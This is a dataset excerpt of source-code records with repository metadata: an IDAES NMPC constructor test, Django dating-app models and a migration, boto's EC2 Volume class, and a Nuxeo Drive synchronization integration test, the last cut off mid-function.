blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1500a3650158cc07514dfc13b7275ebab2abb595 | 15c04e143e7b411e3020cf68eae4d6fbefa73c4b | /idaes/apps/caprese/tests/test_nmpc_constructor_4.py | 14a73fdc3ff7cc4ad9620af5e01d0088e5bdcc5a | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ryder-shallbetter/idaes-pse | 57f272506edc9d1bce851680b8e451e64d08a90c | eed7790869d2859e92f0b3dd8ea3ebe8c9f0462c | refs/heads/master | 2022-12-09T07:10:44.905376 | 2020-09-04T23:00:39 | 2020-09-04T23:00:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,693 | py | ##############################################################################
# Institute for the Design of Advanced Energy Systems Process Systems
# Engineering Framework (IDAES PSE Framework) Copyright (c) 2018-2019, by the
# software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia
# University Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.txt and LICENSE.txt for full copyright and
# license information, respectively. Both files are also available online
# at the URL "https://github.com/IDAES/idaes-pse".
##############################################################################
"""
Test for Cappresse's module for NMPC.
"""
import pytest
from pyomo.environ import (Block, ConcreteModel, Constraint, Expression,
Set, SolverFactory, Var, value,
TransformationFactory, TerminationCondition)
from pyomo.network import Arc
from pyomo.kernel import ComponentSet
from idaes.core import (FlowsheetBlock, MaterialBalanceType, EnergyBalanceType,
MomentumBalanceType)
from idaes.core.util.model_statistics import (degrees_of_freedom,
activated_equalities_generator)
from idaes.core.util.initialization import initialize_by_time_element
from idaes.core.util.exceptions import ConfigurationError
from idaes.generic_models.unit_models import CSTR, Mixer, MomentumMixingType
from idaes.apps.caprese import nmpc
from idaes.apps.caprese.nmpc import *
from idaes.apps.caprese.examples.cstr_model import make_model
import idaes.logger as idaeslog
__author__ = "Robert Parker"
# See if ipopt is available and set up solver
if SolverFactory('ipopt').available():
solver = SolverFactory('ipopt')
solver.options = {'tol': 1e-6,
'mu_init': 1e-8,
'bound_push': 1e-8}
else:
solver = None
def assert_categorization(model):
init_input_set = ComponentSet([model.mixer.S_inlet.flow_vol[0],
model.mixer.E_inlet.flow_vol[0]])
init_deriv_list = []
init_diff_list = []
init_fixed_list = [
model.mixer.E_inlet.temperature[0],
model.mixer.S_inlet.temperature[0],
model.cstr.control_volume.energy_holdup[0, 'aq'],
model.cstr.control_volume.material_accumulation[0, 'aq', 'E'],
]
init_ic_list = [
model.cstr.control_volume.material_holdup[0, 'aq', 'S'],
model.cstr.control_volume.material_holdup[0, 'aq', 'C'],
model.cstr.control_volume.material_holdup[0, 'aq', 'P'],
model.cstr.control_volume.volume[0],
]
init_alg_list = [
model.cstr.control_volume.volume[0],
model.cstr.outlet.flow_vol[0],
model.cstr.outlet.temperature[0],
model.cstr.inlet.flow_vol[0],
model.cstr.inlet.temperature[0],
model.mixer.outlet.flow_vol[0],
model.mixer.outlet.temperature[0],
model.cstr.control_volume.energy_accumulation[0, 'aq'],
model.cstr.control_volume.material_holdup[0, 'aq', 'E'],
]
for j in model.properties.component_list:
init_deriv_list.append(
model.cstr.control_volume.material_accumulation[0, 'aq', j])
init_diff_list.append(
model.cstr.control_volume.material_holdup[0, 'aq', j])
init_fixed_list.append(model.mixer.E_inlet.conc_mol[0, j])
init_fixed_list.append(model.mixer.S_inlet.conc_mol[0, j])
init_alg_list.extend([
model.cstr.control_volume.properties_out[0].flow_mol_comp[j],
model.cstr.inlet.conc_mol[0, j],
model.cstr.control_volume.properties_in[0].flow_mol_comp[j],
model.cstr.control_volume.rate_reaction_generation[0, 'aq', j],
model.mixer.mixed_state[0].flow_mol_comp[j],
model.mixer.E_inlet_state[0].flow_mol_comp[j],
model.mixer.S_inlet_state[0].flow_mol_comp[j],
])
if j != 'Solvent':
init_alg_list.append(model.mixer.outlet.conc_mol[0, j])
init_alg_list.append(model.cstr.outlet.conc_mol[0, j])
else:
init_fixed_list.append(model.cstr.outlet.conc_mol[0, j])
init_fixed_list.append(model.mixer.outlet.conc_mol[0, j])
for r in model.reactions.rate_reaction_idx:
init_alg_list.extend([
model.cstr.control_volume.reactions[0].reaction_coef[r],
model.cstr.control_volume.reactions[0].reaction_rate[r],
model.cstr.control_volume.rate_reaction_extent[0, r]
])
init_deriv_set = ComponentSet(init_deriv_list)
init_diff_set = ComponentSet(init_diff_list)
init_fixed_set = ComponentSet(init_fixed_list)
init_ic_set = ComponentSet(init_ic_list)
init_alg_set = ComponentSet(init_alg_list)
assert model._NMPC_NAMESPACE.input_vars.n_vars == len(init_input_set)
for v in model._NMPC_NAMESPACE.input_vars:
assert v[0] in init_input_set
assert model._NMPC_NAMESPACE.deriv_vars.n_vars == len(init_deriv_set)
for v in model._NMPC_NAMESPACE.deriv_vars:
assert v[0] in init_deriv_set
assert len(model._NMPC_NAMESPACE.diff_vars) == len(init_deriv_set)
for v in model._NMPC_NAMESPACE.diff_vars:
assert v[0] in init_diff_set
assert len(model._NMPC_NAMESPACE.fixed_vars) == len(init_fixed_set)
for v in model._NMPC_NAMESPACE.fixed_vars:
assert v[0] in init_fixed_set
assert len(model._NMPC_NAMESPACE.alg_vars) == len(init_alg_set)
for v in model._NMPC_NAMESPACE.alg_vars:
assert v[0] in init_alg_set
assert len(model._NMPC_NAMESPACE.ic_vars) == len(init_ic_set)
for v in model._NMPC_NAMESPACE.ic_vars:
assert v[0] in init_ic_set
assert len(model._NMPC_NAMESPACE.scalar_vars) == 0
for var in model._NMPC_NAMESPACE.deriv_vars:
assert len(var) == len(model._NMPC_NAMESPACE.get_time())
assert var.index_set() is model._NMPC_NAMESPACE.get_time()
for var in model._NMPC_NAMESPACE.alg_vars:
assert len(var) == len(model._NMPC_NAMESPACE.get_time())
assert var.index_set() is model._NMPC_NAMESPACE.get_time()
@pytest.mark.component
def test_constructor_4():
m_plant = make_model(horizon=6, ntfe=60, ntcp=2)
m_controller = make_model(horizon=3, ntfe=30, ntcp=2)
sample_time = 0.5
# Six samples per horizon, five elements per sample
initial_plant_inputs = [m_plant.fs.mixer.S_inlet.flow_vol[0],
m_plant.fs.mixer.E_inlet.flow_vol[0]]
# Fix some derivative vars, as in pseudo-steady state
# Controller model only
for t in m_controller.fs.time:
m_controller.fs.cstr.control_volume.\
energy_accumulation[t, 'aq'].fix(0)
m_controller.fs.cstr.control_volume.\
material_accumulation[t, 'aq', 'E'].fix(0)
m_controller.fs.cstr.control_volume.\
energy_holdup[0, 'aq'].unfix()
m_controller.fs.cstr.control_volume.\
material_holdup[0, 'aq', 'E'].unfix()
m_controller.fs.cstr.control_volume.\
energy_accumulation_disc_eq.deactivate()
m_controller.fs.cstr.control_volume.\
material_accumulation_disc_eq.deactivate()
nmpc = NMPCSim(m_plant.fs, m_plant.fs.time,
m_controller.fs, m_controller.fs.time,
inputs_at_t0=initial_plant_inputs,
solver=solver, outlvl=idaeslog.DEBUG,
sample_time=sample_time)
if __name__ == '__main__':
test_constructor_4()
| [
"KSBeattie@lbl.gov"
] | KSBeattie@lbl.gov |
94857daf8736ce503d5898c9038a404167adde62 | 5d4158f1afa78f0a057c4e78846a918a1d4d3404 | /backend/dating/models.py | a0eec889f555525faa2e5a8a65b4854827a6acdf | [] | no_license | crowdbotics-apps/ayou-20920 | 08c1c10a73a134a53449b8688634564ed5293a21 | 0b51e4eacf271f8a956c530cdad52c57a2fa6f88 | refs/heads/master | 2022-12-18T05:33:07.601092 | 2020-10-01T03:51:32 | 2020-10-01T03:51:32 | 300,129,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,637 | py | from django.conf import settings
from django.db import models
class Profile(models.Model):
"Generated Model"
bio = models.TextField()
school = models.TextField()
date_of_birth = models.DateField()
created = models.DateField(
auto_now_add=True,
)
modified = models.DateField(
auto_now=True,
)
user = models.OneToOneField(
"users.User",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="profile_user",
)
class UserPhoto(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="userphoto_user",
)
photo = models.URLField()
class Setting(models.Model):
"Generated Model"
maximum_distance = models.IntegerField()
gender = models.CharField(
max_length=256,
)
age_range = models.IntegerField()
show_me_on_searches = models.BooleanField()
new_matches_notification = models.BooleanField()
message_notification = models.BooleanField()
message_likes_notification = models.BooleanField()
super_like_notification = models.BooleanField()
in_app_vibrations = models.BooleanField()
user = models.ForeignKey(
"users.User",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="setting_user",
)
class Dislike(models.Model):
"Generated Model"
owner = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="dislike_owner",
)
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="dislike_user",
)
class Like(models.Model):
"Generated Model"
owner = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="like_owner",
)
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="like_user",
)
super_liked = models.BooleanField()
class Inbox(models.Model):
"Generated Model"
slug = models.SlugField(
max_length=50,
)
created = models.DateTimeField(
auto_now_add=True,
)
class Match(models.Model):
"Generated Model"
user = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="match_user",
)
owner = models.ForeignKey(
"users.User",
on_delete=models.CASCADE,
related_name="match_owner",
)
created = models.DateTimeField(
auto_now_add=True,
)
# Create your models here.
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
8542d8f94f5387e2b934915f15545a3bf0b258a6 | a59d55ecf9054d0750168d3ca9cc62a0f2b28b95 | /.install/.backup/platform/gsutil/third_party/boto/boto/ec2/volume.py | 95121fa8134b8cffc7f46533ef2b3dbf26f3c8b3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | bopopescu/google-cloud-sdk | bb2746ff020c87271398196f21a646d9d8689348 | b34e6a18f1e89673508166acce816111c3421e4b | refs/heads/master | 2022-11-26T07:33:32.877033 | 2014-06-29T20:43:23 | 2014-06-29T20:43:23 | 282,306,367 | 0 | 0 | NOASSERTION | 2020-07-24T20:04:47 | 2020-07-24T20:04:46 | null | UTF-8 | Python | false | false | 10,262 | py | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an EC2 Elastic Block Storage Volume
"""
from boto.resultset import ResultSet
from boto.ec2.tag import Tag
from boto.ec2.ec2object import TaggedEC2Object
class Volume(TaggedEC2Object):
"""
Represents an EBS volume.
:ivar id: The unique ID of the volume.
:ivar create_time: The timestamp of when the volume was created.
:ivar status: The status of the volume.
:ivar size: The size (in GB) of the volume.
:ivar snapshot_id: The ID of the snapshot this volume was created
from, if applicable.
:ivar attach_data: An AttachmentSet object.
:ivar zone: The availability zone this volume is in.
:ivar type: The type of volume (standard or consistent-iops)
:ivar iops: If this volume is of type consistent-iops, this is
the number of IOPS provisioned (10-300).
"""
def __init__(self, connection=None):
super(Volume, self).__init__(connection)
self.id = None
self.create_time = None
self.status = None
self.size = None
self.snapshot_id = None
self.attach_data = None
self.zone = None
self.type = None
self.iops = None
def __repr__(self):
return 'Volume:%s' % self.id
def startElement(self, name, attrs, connection):
retval = super(Volume, self).startElement(name, attrs, connection)
if retval is not None:
return retval
if name == 'attachmentSet':
self.attach_data = AttachmentSet()
return self.attach_data
elif name == 'tagSet':
self.tags = ResultSet([('item', Tag)])
return self.tags
else:
return None
def endElement(self, name, value, connection):
if name == 'volumeId':
self.id = value
elif name == 'createTime':
self.create_time = value
elif name == 'status':
if value != '':
self.status = value
elif name == 'size':
self.size = int(value)
elif name == 'snapshotId':
self.snapshot_id = value
elif name == 'availabilityZone':
self.zone = value
elif name == 'volumeType':
self.type = value
elif name == 'iops':
self.iops = int(value)
else:
setattr(self, name, value)
def _update(self, updated):
self.__dict__.update(updated.__dict__)
def update(self, validate=False, dry_run=False):
"""
Update the data associated with this volume by querying EC2.
:type validate: bool
:param validate: By default, if EC2 returns no data about the
volume the update method returns quietly. If
the validate param is True, however, it will
raise a ValueError exception if no data is
returned from EC2.
"""
# Check the resultset since Eucalyptus ignores the volumeId param
unfiltered_rs = self.connection.get_all_volumes(
[self.id],
dry_run=dry_run
)
rs = [x for x in unfiltered_rs if x.id == self.id]
if len(rs) > 0:
self._update(rs[0])
elif validate:
raise ValueError('%s is not a valid Volume ID' % self.id)
return self.status
def delete(self, dry_run=False):
"""
Delete this EBS volume.
:rtype: bool
:return: True if successful
"""
return self.connection.delete_volume(self.id, dry_run=dry_run)
def attach(self, instance_id, device, dry_run=False):
"""
Attach this EBS volume to an EC2 instance.
:type instance_id: str
:param instance_id: The ID of the EC2 instance to which it will
be attached.
:type device: str
:param device: The device on the instance through which the
volume will be exposed (e.g. /dev/sdh)
:rtype: bool
:return: True if successful
"""
return self.connection.attach_volume(
self.id,
instance_id,
device,
dry_run=dry_run
)
def detach(self, force=False, dry_run=False):
"""
Detach this EBS volume from an EC2 instance.
:type force: bool
:param force: Forces detachment if the previous detachment
attempt did not occur cleanly. This option can lead to
data loss or a corrupted file system. Use this option only
as a last resort to detach a volume from a failed
instance. The instance will not have an opportunity to
flush file system caches nor file system meta data. If you
use this option, you must perform file system check and
repair procedures.
:rtype: bool
:return: True if successful
"""
instance_id = None
if self.attach_data:
instance_id = self.attach_data.instance_id
device = None
if self.attach_data:
device = self.attach_data.device
return self.connection.detach_volume(
self.id,
instance_id,
device,
force,
dry_run=dry_run
)
def create_snapshot(self, description=None, dry_run=False):
"""
Create a snapshot of this EBS Volume.
:type description: str
:param description: A description of the snapshot.
Limited to 256 characters.
:rtype: :class:`boto.ec2.snapshot.Snapshot`
:return: The created Snapshot object
"""
return self.connection.create_snapshot(
self.id,
description,
dry_run=dry_run
)
def volume_state(self):
"""
Returns the state of the volume. Same value as the status attribute.
"""
return self.status
def attachment_state(self):
"""
Get the attachment state.
"""
state = None
if self.attach_data:
state = self.attach_data.status
return state
def snapshots(self, owner=None, restorable_by=None, dry_run=False):
"""
Get all snapshots related to this volume. Note that this requires
that all available snapshots for the account be retrieved from EC2
first and then the list is filtered client-side to contain only
those for this volume.
:type owner: str
:param owner: If present, only the snapshots owned by the
specified user will be returned. Valid values are:
* self
* amazon
* AWS Account ID
:type restorable_by: str
:param restorable_by: If present, only the snapshots that
are restorable by the specified account id will be returned.
:rtype: list of L{boto.ec2.snapshot.Snapshot}
:return: The requested Snapshot objects
"""
rs = self.connection.get_all_snapshots(
owner=owner,
restorable_by=restorable_by,
dry_run=dry_run
)
mine = []
for snap in rs:
if snap.volume_id == self.id:
mine.append(snap)
return mine
class AttachmentSet(object):
"""
Represents an EBS attachmentset.
:ivar id: The unique ID of the volume.
:ivar instance_id: The unique ID of the attached instance
:ivar status: The status of the attachment
:ivar attach_time: Attached since
:ivar device: The device the instance has mapped
"""
def __init__(self):
self.id = None
self.instance_id = None
self.status = None
self.attach_time = None
self.device = None
def __repr__(self):
return 'AttachmentSet:%s' % self.id
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'volumeId':
self.id = value
elif name == 'instanceId':
self.instance_id = value
elif name == 'status':
self.status = value
elif name == 'attachTime':
self.attach_time = value
elif name == 'device':
self.device = value
else:
setattr(self, name, value)
class VolumeAttribute(object):
def __init__(self, parent=None):
self.id = None
self._key_name = None
self.attrs = {}
def startElement(self, name, attrs, connection):
if name == 'autoEnableIO':
self._key_name = name
return None
def endElement(self, name, value, connection):
if name == 'value':
if value.lower() == 'true':
self.attrs[self._key_name] = True
else:
self.attrs[self._key_name] = False
elif name == 'volumeId':
self.id = value
else:
setattr(self, name, value)
| [
"alfred.wechselberger@technologyhatchery.com"
] | alfred.wechselberger@technologyhatchery.com |
4b85b79664d408e8e59f8668f2192d221940e4a3 | fcc25875b877510d5603fccfd0b85dbac58fa8d9 | /app/migrations/0003_auto_20170802_1443.py | 07ffea30903d1e974b645322a9555bd034f418b0 | [] | no_license | kmjnhb/repo | be44e0d7a685aae140e581a5b8c0935a8ddf0d7b | ac3cb388f87f2188900beac956dee6c701aaa556 | refs/heads/master | 2021-01-02T08:55:48.242512 | 2017-08-06T19:37:53 | 2017-08-06T19:37:53 | 99,100,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 996 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-02 14:43
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0002_auto_20170802_1055'),
]
operations = [
migrations.CreateModel(
name='Manager',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_manager', models.BooleanField(default=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='client',
name='is_client',
field=models.BooleanField(default=False),
),
]
| [
"you@example.com"
] | you@example.com |
41e40cf789ecd98da9bf0c36bce15b2362c97741 | 21c147d677ca59b6cb85900cf698896b658bcf45 | /nuxeo-drive-client/nxdrive/tests/test_integration_synchronization.py | 4e2318b7819eec2f9f3b93ecdd0fcd4f9cccbf15 | [] | no_license | bjalon/nuxeo-drive | c674d98aa1ec35bea7cb6f7f3240540cdbb55ce5 | 30f70c4da6f8bdf245d3444f5f546cb3236cf418 | refs/heads/master | 2021-01-23T21:30:07.839766 | 2012-09-03T12:44:59 | 2012-09-03T12:44:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,231 | py | import hashlib
import os
import shutil
import tempfile
import time
import urllib2
import socket
import httplib
from nose import with_setup
from nose import SkipTest
from nose.tools import assert_equal
from nxdrive.client import NuxeoClient
from nxdrive.client import LocalClient
from nxdrive.controller import Controller
TEST_WORKSPACE_PATH = '/default-domain/workspaces/test-nxdrive'
TEST_WORKSPACE_TITLE = 'Nuxeo Drive Tests'
TEST_WORKSPACE = None
EMPTY_DIGEST = hashlib.md5().hexdigest()
SOME_TEXT_CONTENT = "Some text content."
SOME_TEXT_DIGEST = hashlib.md5(SOME_TEXT_CONTENT).hexdigest()
NUXEO_URL = None
USER = None
PASSWORD = None
LOCAL_TEST_FOLDER = None
LOCAL_NXDRIVE_FOLDER = None
LOCAL_NXDRIVE_CONF_FOLDER = None
remote_client = None
ctl = None
def setup_integration_env():
global NUXEO_URL, USER, PASSWORD
global remote_client, lcclient, TEST_WORKSPACE, LOCAL_TEST_FOLDER
global LOCAL_NXDRIVE_FOLDER, LOCAL_NXDRIVE_CONF_FOLDER
global ctl
# Check the Nuxeo server test environment
NUXEO_URL = os.environ.get('NXDRIVE_TEST_NUXEO_URL')
USER = os.environ.get('NXDRIVE_TEST_USER')
PASSWORD = os.environ.get('NXDRIVE_TEST_PASSWORD')
if None in (NUXEO_URL, USER, PASSWORD):
raise SkipTest("No integration server configuration found in "
"environment.")
parent_path = os.path.dirname(TEST_WORKSPACE_PATH)
workspace_name = os.path.basename(TEST_WORKSPACE_PATH)
root_remote_client = NuxeoClient(NUXEO_URL, USER, PASSWORD,
base_folder='/')
TEST_WORKSPACE = root_remote_client.create(
parent_path, 'Workspace', name=workspace_name,
properties={'dc:title': TEST_WORKSPACE_TITLE})[u'uid']
# Client to be use to create remote test documents and folders
remote_client = NuxeoClient(NUXEO_URL, USER, PASSWORD,
base_folder=TEST_WORKSPACE)
# Check the local filesystem test environment
LOCAL_TEST_FOLDER = tempfile.mkdtemp('-nuxeo-drive-tests')
LOCAL_NXDRIVE_FOLDER = os.path.join(
LOCAL_TEST_FOLDER, 'Nuxeo Drive')
os.mkdir(LOCAL_NXDRIVE_FOLDER)
LOCAL_NXDRIVE_CONF_FOLDER = os.path.join(
LOCAL_TEST_FOLDER, 'nuxeo-drive-conf')
os.mkdir(LOCAL_NXDRIVE_CONF_FOLDER)
ctl = Controller(LOCAL_NXDRIVE_CONF_FOLDER)
def teardown_integration_env():
if ctl is not None:
ctl.get_session().close()
if remote_client is not None and remote_client.exists(TEST_WORKSPACE):
remote_client.delete(TEST_WORKSPACE, use_trash=False)
if os.path.exists(LOCAL_TEST_FOLDER):
shutil.rmtree(LOCAL_TEST_FOLDER)
with_integration_env = with_setup(
setup_integration_env, teardown_integration_env)
def make_server_tree():
# create some folders on the server
folder_1 = remote_client.make_folder(TEST_WORKSPACE, 'Folder 1')
folder_1_1 = remote_client.make_folder(folder_1, 'Folder 1.1')
folder_1_2 = remote_client.make_folder(folder_1, 'Folder 1.2')
folder_2 = remote_client.make_folder(TEST_WORKSPACE, 'Folder 2')
# create some files on the server
remote_client.make_file(folder_2, 'Duplicated File.txt',
content="Some content.")
remote_client.make_file(folder_2, 'Duplicated File.txt',
content="Other content.")
remote_client.make_file(folder_1, 'File 1.txt', content="aaa")
remote_client.make_file(folder_1_1, 'File 2.txt', content="bbb")
remote_client.make_file(folder_1_2, 'File 3.txt', content="ccc")
remote_client.make_file(folder_2, 'File 4.txt', content="ddd")
remote_client.make_file(TEST_WORKSPACE, 'File 5.txt', content="eee")
@with_integration_env
def test_binding_initialization_and_first_sync():
# Create some documents in a Nuxeo workspace and bind this server to a
# Nuxeo Drive local folder
make_server_tree()
ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
# The binding operation creates a new local folder with the Workspace name
# and reproduce the server side structure with folders and empty documents.
expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
local = LocalClient(expected_folder)
level_0 = local.get_children_info('/')
def size(info):
return os.stat(info.filepath).st_size
assert_equal(len(level_0), 3)
assert_equal(level_0[0].name, 'File 5.txt')
assert_equal(size(level_0[0]), 0)
assert_equal(level_0[1].name, 'Folder 1')
assert_equal(level_0[2].name, 'Folder 2')
level_1 = local.get_children_info(level_0[1].path)
assert_equal(len(level_1), 3)
assert_equal(level_1[0].name, 'File 1.txt')
assert_equal(size(level_1[0]), 0)
assert_equal(level_1[1].name, 'Folder 1.1')
assert_equal(level_1[2].name, 'Folder 1.2')
level_2 = local.get_children_info(level_0[2].path)
assert_equal(len(level_2), 3)
assert_equal(level_2[0].name, 'Duplicated File.txt')
assert_equal(size(level_2[0]), 0)
assert_equal(level_2[1].name, 'Duplicated File__1.txt') # deduped name
assert_equal(size(level_2[1]), 0)
assert_equal(level_2[2].name, 'File 4.txt')
assert_equal(size(level_2[2]), 0)
# Check the aggregate states information from the controller
states = ctl.children_states(expected_folder)
expected_states = [
(u'/File 5.txt', 'remotely_modified'),
(u'/Folder 1', 'children_modified'),
(u'/Folder 2', 'children_modified'),
]
assert_equal(states, expected_states)
states = ctl.children_states(expected_folder + '/Folder 1')
expected_states = [
(u'/Folder 1/File 1.txt', 'remotely_modified'),
(u'/Folder 1/Folder 1.1', 'children_modified'),
(u'/Folder 1/Folder 1.2', 'children_modified'),
]
assert_equal(states, expected_states)
states = ctl.children_states(expected_folder + '/Folder 1/Folder 1.1')
expected_states = [
(u'/Folder 1/Folder 1.1/File 2.txt', 'remotely_modified'),
]
assert_equal(states, expected_states)
# Check the list of files and folders with synchronization pending
pending = ctl.list_pending()
assert_equal(len(pending), 7)
assert_equal(pending[0].path, '/File 5.txt')
assert_equal(pending[1].path, '/Folder 1/File 1.txt')
assert_equal(pending[2].path, '/Folder 1/Folder 1.1/File 2.txt')
assert_equal(pending[3].path, '/Folder 1/Folder 1.2/File 3.txt')
assert_equal(pending[4].path, '/Folder 2/Duplicated File.txt')
assert_equal(pending[5].path, '/Folder 2/Duplicated File__1.txt')
assert_equal(pending[6].path, '/Folder 2/File 4.txt')
# It is also possible to restrict the list of pending document to a
# specific root
assert_equal(len(ctl.list_pending(local_root=expected_folder)), 7)
# It is also possible to restrict the number of pending tasks
pending = ctl.list_pending(limit=2)
assert_equal(len(pending), 2)
# Synchronize the first 2 documents:
assert_equal(ctl.synchronize(limit=2), 2)
pending = ctl.list_pending()
assert_equal(len(pending), 5)
assert_equal(pending[0].path, '/Folder 1/Folder 1.1/File 2.txt')
assert_equal(pending[1].path, '/Folder 1/Folder 1.2/File 3.txt')
assert_equal(pending[2].path, '/Folder 2/Duplicated File.txt')
assert_equal(pending[3].path, '/Folder 2/Duplicated File__1.txt')
assert_equal(pending[4].path, '/Folder 2/File 4.txt')
states = ctl.children_states(expected_folder)
expected_states = [
(u'/File 5.txt', 'synchronized'),
(u'/Folder 1', 'children_modified'),
(u'/Folder 2', 'children_modified'),
]
# The actual content of the file has been updated
assert_equal(local.get_content('/File 5.txt'), "eee")
states = ctl.children_states(expected_folder + '/Folder 1')
expected_states = [
(u'/Folder 1/File 1.txt', 'synchronized'),
(u'/Folder 1/Folder 1.1', 'children_modified'),
(u'/Folder 1/Folder 1.2', 'children_modified'),
]
assert_equal(states, expected_states)
# synchronize everything else
assert_equal(ctl.synchronize(), 5)
assert_equal(ctl.list_pending(), [])
states = ctl.children_states(expected_folder)
expected_states = [
(u'/File 5.txt', 'synchronized'),
(u'/Folder 1', 'synchronized'),
(u'/Folder 2', 'synchronized'),
]
assert_equal(states, expected_states)
states = ctl.children_states(expected_folder + '/Folder 1')
expected_states = [
(u'/Folder 1/File 1.txt', 'synchronized'),
(u'/Folder 1/Folder 1.1', 'synchronized'),
(u'/Folder 1/Folder 1.2', 'synchronized'),
]
assert_equal(states, expected_states)
assert_equal(local.get_content('/Folder 1/File 1.txt'), "aaa")
assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "bbb")
assert_equal(local.get_content('/Folder 1/Folder 1.2/File 3.txt'), "ccc")
assert_equal(local.get_content('/Folder 2/File 4.txt'), "ddd")
assert_equal(local.get_content('/Folder 2/Duplicated File.txt'),
"Some content.")
assert_equal(local.get_content('/Folder 2/Duplicated File__1.txt'),
"Other content.")
# Nothing else left to synchronize
assert_equal(ctl.list_pending(), [])
assert_equal(ctl.synchronize(), 0)
assert_equal(ctl.list_pending(), [])
@with_integration_env
def test_binding_synchronization_empty_start():
ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
# Nothing to synchronize by default
assert_equal(ctl.list_pending(), [])
assert_equal(ctl.synchronize(), 0)
# Let's create some document on the server
make_server_tree()
# By default nothing is detected
assert_equal(ctl.list_pending(), [])
#assert_equal(ctl.children_states(expected_folder), [])
# Let's scan manually
session = ctl.get_session()
ctl.scan_remote(expected_folder, session)
# Changes on the remote server have been detected...
assert_equal(len(ctl.list_pending()), 11)
# ...but nothing is yet visible locally as those files don't exist there
# yet.
#assert_equal(ctl.children_states(expected_folder), [])
# Let's perform the synchronization
assert_equal(ctl.synchronize(limit=100), 11)
# We should now be fully synchronized
assert_equal(len(ctl.list_pending()), 0)
assert_equal(ctl.children_states(expected_folder), [
(u'/File 5.txt', u'synchronized'),
(u'/Folder 1', u'synchronized'),
(u'/Folder 2', u'synchronized'),
])
local = LocalClient(expected_folder)
assert_equal(local.get_content('/Folder 1/File 1.txt'), "aaa")
assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "bbb")
assert_equal(local.get_content('/Folder 1/Folder 1.2/File 3.txt'), "ccc")
